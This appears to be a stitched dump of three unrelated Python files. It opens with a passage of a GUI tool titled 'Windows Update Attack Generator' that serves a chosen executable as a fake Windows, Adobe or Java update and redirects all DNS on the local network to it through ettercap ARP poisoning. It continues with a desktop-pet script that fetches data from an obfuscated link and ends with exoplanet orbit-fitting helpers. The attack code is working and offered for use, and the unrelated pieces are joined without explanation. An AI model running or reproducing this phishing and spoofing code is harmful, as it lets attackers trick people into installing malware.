with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_start = QPushButton("Start DNS",self)
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_start.setFixedHeight(50)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_start.setIcon(QIcon("rsc/start.png"))
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_start.clicked.connect(self.dns_start)
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_start,0,3)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Module/Win-Explo/Windows_Update/index.html"):
remove("Module/Win-Explo/Windows_Update/index.html")
if path.isfile("Module/Win-Explo/Windows_Update/windows-update.exe"):
remove("Module/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Module/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
except OSError,e:
print e
if not getuid() != 0:
file_html = open("Module/Win-Explo/Settings_WinUpdate.html","r").read()
settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
if self.path_file_etter == None:
self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
if not self.path_file_etter != None:
QMessageBox.information(self, 'Path not Found', "the file etter.dns not found check if ettercap this installed")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
QMessageBox.information(self, 'Server Phishing Error', "Error not start Server...")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
def getSize(self,filename):
st = stat(filename)
return st.st_size
|
skahdibuddy.py
|
import tkinter as tk
from tkinter import *
from os import listdir
from os.path import isfile, join
from PIL import Image
from random import randint
import os, tempfile, cv2, time
import sys, webbrowser, shutil ,random, pyttsx3, threading
import json, ctypes, subprocess, pythoncom, subprocess, re
import base64, urllib, requests
global speechdatabase, proclist
print("Sorry for the shit log output in advance. I'll clean this up asap")
try:
with open('config.ini') as data_file:
configsetting = json.load(data_file)
ctypes.windll.user32.MessageBoxW(0, "Welcome back to SkahdiBuddy!\nPlease note that SkahdiBuddy takes a moment to boot up. We're working on improving the boot time.", "SkahdiBuddy v1", 0)
except:
configsetting={}
configsetting['walkdelay'] = 0.02
configsetting['thinkdelay'] = 0.001
configsetting['sleepdelay'] = 0.1
configsetting['talkdelay'] = 0.1
configsetting['speech'] = {}
configsetting['speech']['wordsperminute'] = 120
configsetting['speech']['speechvolume'] = 0.9
configsetting['speech_db'] = {}
configsetting['speech_db']['update'] = True
configsetting['speech_db']['encrypt_key'] = 'sbv1'
configsetting['speech_db']['link'] = 'w5vDlsOqwqHDpsKcwqVgw6rDmcOtX8OXw5TDpcKhw5XDkcOuX8OWw5HDo2DDpsKRwqvCp8Olw5XDqMKiwqnDg8OmZcOYw5jCrsKTw5XCkcOJfcK5wpDDqsKpw6fCocOawp3CsMKT'
j = json.dumps(configsetting, indent=4)
f = open('config.ini', 'w')
print(j, end="", file=f)
f.close()
ctypes.windll.user32.MessageBoxW(0, "Welcome to SkahdiBuddy V1.\nThis is either your very first time using me, or you messed up my config file.\nNo matter! I'll make a new one real quick!\nPlease note that SkahdiBuddy takes a moment to boot up. We're working on improving the boot time.", "Mew! SkahdiBuddy v1", 0)
def updateprocesses():
procs = subprocess.check_output(['tasklist'], shell=True)
procs = re.split('\s+',str(procs))
proclist = []
for x in procs:
if ".exe" in x:
proclist.append(x.replace("K\\r\\n","").lower())
updateprocesses.proclist = list(set(proclist))
return proclist
## download speech data library and load it into the db
## decode and encode stolen from https://stackoverflow.com/a/38223403
## - thanks, Ryan Barrett
## PS. I think this entire decode/encode thing is really unnecessary. But ya'll asked for it in the group
## because ya'll didn't want any speech spoilers. so this one is for you.
## PPS. speechdb.sbuddy is not encoded _yet_, sorry. We're getting there.
def update(speechlibrarylink):
link = speechlibrarylink
openlink = urllib.request.urlopen(link).read()
openlink = openlink.decode()
speechlines = openlink
#print(speechlines)
speechlines = speechlines.split('\r\n\r\n')
speechdatabase = {}
for x in speechlines:
program = x.replace("\r","").split('\n',1)[0]
comebacks = x.replace("\r","").split('\n',1)[1].split("\n")
speechdatabase[program]={}
speechdatabase[program]['comebacks']=comebacks
j = json.dumps(speechdatabase, indent=4)
f = open('speechdb.sbuddy', 'w')
print(j, end = "", file = f)
f.close()
print("wrote.")
#print(librarydecoded)
def decode(key, enc):
dec = []
enc = base64.urlsafe_b64decode(enc).decode()
for i in range(len(enc)):
key_c = key[i % len(key)]
dec_c = chr((256 + ord(enc[i]) - ord(key_c)) % 256)
dec.append(dec_c)
speechlibrarylink = ("".join(dec))
update(speechlibrarylink)
def encode(key, clear):
enc = []
for i in range(len(clear)):
key_c = key[i % len(key)]
enc_c = chr((ord(clear[i]) + ord(key_c)) % 256)
enc.append(enc_c)
print(base64.urlsafe_b64encode("".join(enc).encode()).decode())
#encode(configsetting['speech_db']['encrypt_key'], "https://www.dropbox.com/s/5vrsrq6ap4ev8bb/SLF.txt?dl=1")
if configsetting['speech_db']['update'] == True:
print("Updating speech library...")
try:
decencstr = configsetting['speech_db']['link']
encrypt_key = configsetting['speech_db']['encrypt_key']
decode(encrypt_key, decencstr)
try:
with open('speechdb.sbuddy') as data_file:
speechdatabase = json.load(data_file)
except:
ctypes.windll.user32.MessageBoxW(0, "Sorry for bothering, but I kinda need an internet connection right now.\n\nI'm trying to download the speech databasis, cos it doesn't exist on your local storage.", "SkahdiBuddy v1", 0)
sys.exit()
except:
...
if configsetting['speech_db']['update'] == False:
try:
with open('speechdb.sbuddy') as data_file:
speechdatabase = json.load(data_file)
except:
ctypes.windll.user32.MessageBoxW(0, "Sorry for bothering, but I kinda need an internet connection right now.\n\nI'm trying to download the speech databasis, cos it doesn't exist on your local storage.", "SkahdiBuddy v1", 0)
sys.exit()
spritepath = "./sprites"
onlyfiles = [f for f in listdir(spritepath) if isfile(join(spritepath, f))]
print("Extracting Animations...")
if os.path.exists("./anims"): shutil.rmtree("./anims")
for x in onlyfiles:
#print(onlyfiles)
animation_name = x.split("!")[0]
im = cv2.imread(spritepath+"/"+x)
#print(animation_name)
#print(animation_name)
#print(animation_name)
if not os.path.exists("./anims"):
os.mkdir("./anims")
#print("made animation folder")
if not os.path.exists("./anims/"+animation_name):
os.mkdir("./anims/"+animation_name)
#print("made animation name")
if not os.path.exists("./anims/"+animation_name+"/left"):
os.mkdir("./anims/"+animation_name+"/left")
#print("made animation name / left")
if not os.path.exists("./anims/"+animation_name+"/right"):
os.mkdir("./anims/"+animation_name+"/right")
#print("made animation name / right")
shape_height=(im.shape)[0]
shape_width=(im.shape)[1]
blocks = x.split("!")[1]
#print(str(shape_height), str(shape_width), str(blocks), "=", str(int(shape_width)/int(blocks)))
equs = int(shape_width)/int(blocks)
imageObject = Image.open(spritepath+"/"+x)
## ----------------------------------------------------------------
#print("Stripping sprites from tilesets...")
size=(100,100)
for direction in range(0,1):
for y in range(1,int(blocks)+1):
direction = "right"
#print("BLOCKS: ", blocks)
#print(equs*y)
cropped = imageObject.crop((round(equs*y)-equs-1, 0, round(equs*y), shape_height))
#cropped.save(x+str(y)+".png")
cropped = cropped.resize(size)
cropped.save("./anims/"+animation_name+"/"+direction+"/"+str(y)+".png")
for y in range(1,int(blocks)+1):
direction = "left"
#print("BLOCKS: ", blocks)
#print(equs*y)
cropped = imageObject.crop((round(equs*y)-equs-1, 0, round(equs*y), shape_height))
cropped = cropped.transpose(Image.FLIP_LEFT_RIGHT)
cropped = cropped.resize(size)
cropped.save("./anims/"+animation_name+"/"+direction+"/"+str(y)+".png")
## ----------------------------------------------------------------
print("Spawning SkahdiBuddy...")
root = tk.Tk()
root.overrideredirect(True)# Make window invisible
root.wm_attributes("-topmost", True)# Keep skahdi on top even after min
root.wm_attributes("-transparentcolor", "white")
direction = 'right'
screen_height = root.winfo_screenheight()
char_position = "+10+"+str(screen_height-141)
root.geometry(char_position)
updateprocesses()
proclist = (updateprocesses.proclist)
def popupmenu(event):
try:
popup.tk_popup(event.x_root, event.y_root, 0)
finally:
popup.grab_release()
def idleloop(char_position, direction, proclist):
"""
Idle loop spawns the cat at bottom left.
"""
#print("IDLE ANIMATION", char_position)
global talkvar
talkvar = False
count=0
screen_width = root.winfo_screenwidth()
DIR = "./anims" + '/sprite_thinking/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
nextmove = randint(0,100)
#nextmove = 40
nextmove_start = 0
play_animation = 0
## play_animation
## 0 - pause/sleep
## 1 - play/think
## 2 - talk
walkspeed = configsetting['walkdelay']
talkloops = 5 ## this var runs the talking animation for 5 loops before it returns back to the idle animation
talknumber = 0
while 1: #loop for idle animation
DIR = "./anims" + '/sprite_thinking/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['thinkdelay']
if play_animation == 0:
DIR = "./anims" + '/sprite_thinking/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['thinkdelay']
if play_animation == 1:
DIR = "./anims" + '/sprite_sleeping/' +direction+"/"
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['sleepdelay']
if play_animation == 2:
DIR = "./anims" + '/sprite_talking/' + direction + '/'
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
delay = configsetting['talkdelay']
talknumber = talknumber + 1
if talknumber==talkloops:
talknumber = 0
talkvar = False ## end the talk animation
#print(pausevar)
if count == countmax:
#updateproc = threading.Thread(target=updateprocesses)
#updateproc.daemon = True
#updateproc.start()
count = 0
count = count+1
#print(nextmove_start, nextmove)
## This block decides the character's next move
if nextmove_start==nextmove:
nextmove = randint(40,100)
play_animation = randint(3,20)
#print("PLAYANIMATION",play_animation)
nextmove_start = 0
#play_animation = 1
## Base Animations
## - walk
## - talk
## - idle
if pausevar == True:
play_animation = 1
if talkvar == True:
play_animation = 2
if 3 <= play_animation <= 14: ## Walk!
walk_range = randint(10,200)
direction = random.choice(['left','right'])
print("Walking "+direction)
lr_block = int(char_position.split("+")[1]) ## Left - Right
ud_block = int(char_position.split("+")[-1]) ## Up - Down
## Now load the animation files
DIR = "./anims" + '/sprite_walking/' + direction + '/'
count = 0
countmax = len([name for name in os.listdir(DIR) if os.path.isfile(os.path.join(DIR, name))])
stepjump = lr_block
for steps in range(1,int(walk_range)):
## stepjump max = 1340
## stepjump min = 0
#print("SCREEN WIDTH",screen_width)#1360
if stepjump>=int(screen_width):
stepjump=-80
if stepjump<=-100:
stepjump=int(screen_width)
if direction=="left":
stepjump=stepjump-5
if direction=="right":
stepjump=stepjump+5
if count==countmax:
count=0
count=count+1
#increment by 5. Always
char_position = "+"+str(stepjump)+"+"+str(ud_block)
root.geometry(char_position)
root.image = tk.PhotoImage(file=DIR+str(count)+'.png')
skahlabel = tk.Label(root, image=root.image, bg='white')
skahlabel.pack(side="bottom")
root.update()
skahlabel.destroy()
root.update_idletasks()
time.sleep(walkspeed)
if 15 <= play_animation <= 20:
print("talking "+direction+" "+str(talkvar))
if talkvar == True:
pass
elif talkvar == False:
print("I should be talking -",direction)
talkvar = True ## this makes skahdi speak. please set to false when done speaking.
## speech thread here.
updateprocesses()
proclist = (updateprocesses.proclist)
print("Items in process list",len(proclist))
speak = threading.Thread(target=saysomething, args=(char_position,proclist,))
speak.daemon = True
speak.start()
## speech thread end
#if play_animation==1: ## 1 is always pause.
# playpause = 1
#if play_animation!=1:
# playpause = 0
# ## pause animation here
# ...
try:
nextmove_start+=1
root.geometry(char_position)
root.image = tk.PhotoImage(file=DIR+str(count)+'.png')
skahlabel = tk.Label(root, image=root.image, bg='white')
skahlabel.pack(side="bottom")
root.bind("<Button-3>", popupmenu)
root.update()
skahlabel.destroy()
root.update_idletasks()
time.sleep(delay) # Time module delay
except:
count=0
def saysomething(char_position,proclist):
global bubble, speechbubble, lastprocess
print("I'm talking")
try:
bubble.destroy()
#speechbubble.destroy()
except Exception as e:
...
print("booting blocks")
lr_block = int(char_position.split("+")[1]) ## Left - Right
ud_block = int(char_position.split("+")[-1]) ## Up - Down
print("Spawning new tk bubble")
## this block needs to run once, then never again...
try:
print(bubble)
bubble.destroy()
except:
bubble = tk.Tk()
print("tk.tk set")
bubble.config(background = "white")
bubble.overrideredirect(True)# Make window invisible
bubble.wm_attributes("-topmost", True)# Keep skahdi on top even after min
print("bubble spawned")
#bubble.wm_attributes("-transparentcolor", "white")
bubbleposition = "+"+str(lr_block)+"+"+str(ud_block-randint(50,300))
bubble.geometry(bubbleposition)
print("bubble geometry set")
## check for matching processes
for proc in speechdatabase.keys():
try:
if proc.lower() in proclist:
print("I FOUND "+proc)
selectedcomeback = random.choice(speechdatabase[proc]['comebacks'])
T = tk.Text(bubble, height=1, width = len(selectedcomeback), fg = "black", bg = "white")
T.configure(relief = GROOVE, font=("Courier", 15))
T.pack()
T.insert(tk.END, selectedcomeback)
T.configure(state = "disabled")
bubble.update()
bubble.update_idletasks()
print(selectedcomeback)
break
except Exception as errormsg:
print("-->",errormsg)
try:
## text width is equal to number of letters in comeback
engine = pyttsx3.init()
engine.setProperty('rate',configsetting['speech']['wordsperminute']) # wordsperminute
engine.setProperty('volume',configsetting['speech']['speechvolume']) # speechvolume
engine.say(selectedcomeback)
engine.runAndWait()
print("Reached the mainloop")
except:
print("--> I don't think I found any processes")
pass
def save_config():
j = json.dumps(configsetting, indent=4)
f = open('config.ini', 'w')
print(j, end="", file=f)
f.close()
print("Database Updated")
def openkofi():
webbrowser.open('https://ko-fi.com/snepdev', new=2)
def exitskahdi():
root.destroy()
sys.exit()
def hibernate():
global pausevar
print("hibenate called")
try:
if pausevar==True: pausevar=False
elif pausevar==False: pausevar=True
except Exception as e:
print("Loading pause script")
pausevar = False
print("Pause Skahd?",str(pausevar))
if pausevar == True:
count = 0
while pausevar == True:
break
popup = Menu(root, tearoff=1, title="SB (0.1)", relief=RAISED)
#popup.add_command(label="Tell me a joke")
popup.add_separator()
popup.add_command(label="❤-Donate-❤", command=openkofi)
popup.add_command(label="Pause/Play", command=hibernate)
popup.add_command(label="Exit", command=exitskahdi)
hibernate() ## load pausevar
print("Done!")
idleloop(char_position, direction, proclist)
|
functions.py
|
#!/usr/bin/python
__author__ = 'Trifon Trifonov'
import sys, os
#sys.path.insert(0, '../lib')
import numpy as np
import jac2astrocen
import corner
import re
from subprocess import PIPE, Popen
import signal
import platform
import tempfile, shutil
from threading import Thread
from .Warning_log import Warning_log
import scipy.stats as pdf
import dill
from scipy.signal import argrelextrema
from scipy.ndimage import gaussian_filter
import random
import string
import ntpath
import gls as gls
TAU= 2.0*np.pi
def transit_tperi(per, ecc, om, ma, epoch):
"""It derives Time of periatron [tp]
and time of mid transit [t0]
Parameters
----------
per : float
Period of the planet [days].
ecc : float
Eccentricity of the orbit.
om : float
Argument of periastron [deg]
ma : float
Mean anomaly [deg].
epoch : float
Epoch for wich the orbital elements are valid [BJD].
Returns
-------
[tp,t0]
if the epoch in is BJD then tp and t0 are also in BJD.
"""
om = np.radians(om)
ma = np.radians(ma)
E = 2.0*np.arctan( np.sqrt( ( (1.0-ecc)/(1.0+ecc) ) ) * np.tan( (np.pi/4.0)-(om/2.0) ) )
t_peri = epoch - ((ma/TAU)*per)
t_transit = t_peri + (E + ecc*np.sin(E)) * (per/TAU)
return t_peri, t_transit
def ma_from_t0(per, ecc, om, t_transit, epoch):
'''
'''
om = np.radians(om)
E = 2.0*np.arctan( np.sqrt( ( (1.0-ecc)/(1.0+ecc) ) ) * np.tan( (np.pi/4.0)-(om/2.0) ) )
# t_transit = epoch - ((ma/TAU)*per) + (E + ecc*np.sin(E)) * (per/TAU)
ma = ((epoch - t_transit + (E + ecc*np.sin(E)) * (per/TAU))*TAU)/per
ma = np.degrees(ma)%360.0
return ma
def ma_for_epoch(per, t_peri, epoch):
'''
'''
ma = np.degrees(2.0*np.pi*( (epoch-fit.t_peri)/per % 1.))
return ma
def mass_to_K(P,ecc,incl, pl_mass,Stellar_mass):
'''Returns the RV semi-amplitude K in m/s
Parameters
----------
P : float
Period of the planet in [d]
ecc : float
eccentricity
incl: float
inclination in [deg]
pl_mass: float
planet mass in [Msol]
Stellar_mass: float
Primary mass in [Msol]
Returns
float
K in [m/s]
-------
'''
THIRD = 1.0/3.0
GMSUN = 1.32712497e20
AU=1.49597892e11
T = P*86400.0
#K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
# (Stellar_mass+pl_mass)**(2.0/3.0)) * 1.0/np.sqrt(1.0-ecc**2.0)
K = ((2.0*np.pi*GMSUN)/T)**THIRD * (pl_mass*np.sin(np.radians(incl)) /
(Stellar_mass+pl_mass)**(2.0/3.0))
return K
def convert_Session_to_Py3(old_ses):
"""
Convert a Python 2 sesion to Python 3
"""
# Make a name for the new pickle
new_ses = os.path.splitext(os.path.basename(old_ses))[0]+"_p3.ses"
# Convert Python 2 "ObjectType" to Python 3 object
dill._dill._reverse_typemap["ObjectType"] = object
# Open the pickle using latin1 encoding
with open(old_ses, "rb") as f:
loaded = dill.load(f, encoding="latin1")
# Re-save as Python 3 pickle
with open(new_ses, "wb") as outfile:
dill.dump(loaded, outfile)
return new_ses
def find_close_elements(a, b, precision = 0.01):
"""Finds close elements in two arrays with diffrent sizes.
Parameters
----------
a : array of floats with dimention of N
Description of parameter `a`.
b : array of floats with dimention of M
Description of parameter `b`.
precision : threshold withing which two elements are considered the same.
Description of parameter `precision`.
Returns
-------
[array, array]
returns two arrays with the elements that mathched withing the
precision.
"""
return [[x for x in a for i in b if abs(x - i) < precision], [x for x in b for i in a if abs(x - i) < precision]]
def custom_param_file_for_stability(max_time,time_step):
##### create the param.in file (change only the "t_max" and the "dt" for now) ######
param_file = open('param.in', 'wb')
max_time = float(max_time)*365.25 # make it is days
param_file.write("""0.0d0 %s %s
%s %s
F T T T T F
0.001 50.0 50.0 -1. T
bin.dat
unknown
"""%(max_time, time_step, max_time/1e4, max_time/1e3 ))
param_file.close()
return
def get_mode_of_samples(samples, nsamp):
mode_samp = []
# err1_samp = []
# err2_samp = []
for i in range(nsamp):
#ci = np.percentile(samples[:,i], [level, 100.0-level])
#mmm = stats.binned_statistic(np.array([samples[:,i]]), axis=None)
n, b = np.histogram(samples[:,i], bins=100)
n = gaussian_filter(n, 1.0)
x0 = np.array(list(zip(b[:-1], b[1:]))).flatten()
y0 = np.array(list(zip(n, n))).flatten()
k = np.unravel_index(y0.argmax(),y0.shape)
mode_samp.append(x0[k])
#err1_samp.append(x0[k]- ci[0])
#err2_samp.append(ci[1]- x0[k])
# print el_str[i],'=', x0[k], "- %s"%(x0[k]-ci[0]), "+ %s"%(ci[1] - x0[k] )
return mode_samp #,err1_samp,err2_samp
def get_mean_of_samples(samples, nsamp):
mean_samp = []
for i in range(nsamp):
mean_samp.append(np.mean(samples[:,i]))
return mean_samp
def get_median_of_samples(samples, nsamp):
median_samp = []
for i in range(nsamp):
median_samp.append(np.median(samples[:,i]))
return median_samp
def get_MAD_of_samples(samples, nsamp):
mad_samp = []
for i in range(nsamp):
mad_samp.append(np.mean(np.absolute(samples[:,i] - np.mean(samples[:,i]))))
return mad_samp
def get_best_lnl_of_samples(samples,lnl, nsamp):
best_ln_samp = []
lnL_best_idx = np.argmax(lnl)
lnL_best = lnl[lnL_best_idx]
for i in range(nsamp):
minlnL = samples[lnL_best_idx,i]
best_ln_samp.append(minlnL)
return best_ln_samp,lnL_best #,err1_samp,err2_samp
def cornerplot(obj, fileinput=False, level=(100.0-68.3)/2.0,type_plot = 'mcmc', **kwargs):
#obj = dill.copy(copied_obj)
'''Generates a corner plot visualizing the mcmc samples. Optionally samples can be read from a file.'''
#self.mcmc_sample_file = 'mcmc_samples'+'_%s'%mod
#self.corner_plot_file = 'cornerplot.png'
if(fileinput):
if type_plot == 'mcmc':
samples=read_file_as_array_of_arrays_mcmc(obj.mcmc_sample_file)
if type_plot == 'nest':
samples=read_file_as_array_of_arrays_mcmc(obj.nest_sample_file)
# elif(obj.sampler_saved):
# samples=obj.sampler.samples
else:
raise Exception ('Please run mcmc/nested sampling and save sampler or provide a valid samples file!')
#print(len(obj.e_for_mcmc),len(samples),obj.e_for_mcmc)
fig = corner.corner(samples,bins=25, color="k", reverse=True, upper= True, labels=obj.e_for_mcmc, quantiles=[level/100.0, 1.0-level/100.0],
levels=(0.6827, 0.9545,0.9973), smooth=1.0, smooth1d=1.0, plot_contours= True, show_titles=True, truths=obj.par_for_mcmc,
dpi = 300, pad=15, labelpad = 50 ,truth_color ='r', title_kwargs={"fontsize": 12}, scale_hist=True, no_fill_contours=True,
plot_datapoints=True, kwargs=kwargs)
if type_plot == 'mcmc':
fig.savefig(obj.mcmc_corner_plot_file)
if type_plot == 'nest':
fig.savefig(obj.nest_corner_plot_file)
### memory leak in loops!
fig.clf()
del fig
samples = 0
return
def planet_orbit_xyz(obj, planet):
u1 = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
mean_orb = np.linspace(0,2.0*np.pi, 360)
x = np.zeros(len(mean_orb))
y = np.zeros(len(mean_orb))
z = np.zeros(len(mean_orb))
u = np.zeros(len(mean_orb))
v = np.zeros(len(mean_orb))
w = np.zeros(len(mean_orb))
dist = np.zeros(len(mean_orb))
q = (1.0 - obj.params.planet_params[2 + int(planet)*7])*float(obj.fit_results.a[int(planet)])
#this need to be fixed to work with arrays
for f in range(len(mean_orb)):
x[f],y[f],z[f],u[f],v[f],w[f] = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7]-90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7] ), mean_orb[f])
dist[f] = np.sqrt(x[f]**2.0 + y[f]**2.0 + z[f]**2.0)
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + int(planet)*7],
np.radians(obj.params.planet_params[5 + int(planet)*7] -90.0),
np.radians(obj.params.planet_params[3 + int(planet)*7]) - np.radians(obj.params.planet_params[6 + int(planet)*7]),
np.radians(obj.params.planet_params[6 + int(planet)*7]), np.radians(obj.params.planet_params[4 + int(planet)*7]))
min_index = np.unravel_index(np.argmin(dist, axis=None), dist.shape)
max_index = np.unravel_index(np.argmax(dist, axis=None), dist.shape)
return np.array([x,y,z,u,v,w]), np.array([x_p,y_p,z_p,u_p,v_p,w_p]), np.array([x[min_index],y[min_index],z[min_index],u[min_index],v[min_index],w[min_index]]), np.array([x[max_index],y[max_index],z[max_index],u[max_index],v[max_index],w[max_index]])
def get_xyz(obj):
st_mass = obj.params.stellar_mass * (4*np.pi*np.pi)/(365.25*365.25)
frho3 = 1.0
u1 = st_mass
obj.xyz_mass[0] = u1
Msun = 1.989e33
Au = 1.49597892e13
##### this is a hack avoiding transit init crash!!!! TB fixed/removed
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) == 0 or np.sum(obj.fit_results.a) == 0:
return obj
#####################################################################
for i in range(obj.npl):
pl_mass_in_st = float(obj.fit_results.mass[i])/ 1047.70266835
pl_mass = pl_mass_in_st * (4*np.pi*np.pi)/(365.25*365.25)
q = (1.0 - obj.params.planet_params[2 + i*7])*float(obj.fit_results.a[i])
obj.rpl[i+1] = frho3*(1.5*pl_mass_in_st*Msun/(2*np.pi))**0.3333333333/Au
# rpl(i) = frho3*(1.5d0*mpl0*MSUN/TWOPI)**0.3333333333d0/AU
obj.rhill[i+1] = float(obj.fit_results.a[i])*(pl_mass/(3.0*st_mass))**0.3333333333
u1 = u1 +pl_mass
obj.xyz_mass[i+1] = pl_mass
x_p,y_p,z_p,u_p,v_p,w_p = jac2astrocen.mco_el2x(u1,q,
obj.params.planet_params[2 + i*7],
np.radians(obj.params.planet_params[5 + i*7]),
np.radians(obj.params.planet_params[3 + i*7]) - np.radians(obj.params.planet_params[6 + i*7]),
np.radians(obj.params.planet_params[6 + i*7]), np.radians(obj.params.planet_params[4 + i*7]))
obj.xzy[i+1] = np.array([x_p,y_p,z_p])
obj.uvw[i+1] = np.array([u_p,v_p,w_p])
return obj
def get_Hill_satb(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
if obj.fit_results.mass == 0 or len(np.atleast_1d(obj.fit_results.mass)) <=1:
return False
#####################################################################
else:
Delta_a = (float(obj.fit_results.a[1]) - float(obj.fit_results.a[0]))/float(obj.fit_results.a[0])
Mu = 2.4*( (float(obj.fit_results.mass[0])/ st_mass) + (float(obj.fit_results.mass[1])/ st_mass) )**(1.0/3.0)
if Mu >= Delta_a:
return False
else:
return True
def get_AMD_stab(obj):
st_mass = float(obj.params.stellar_mass)* 1047.70266835
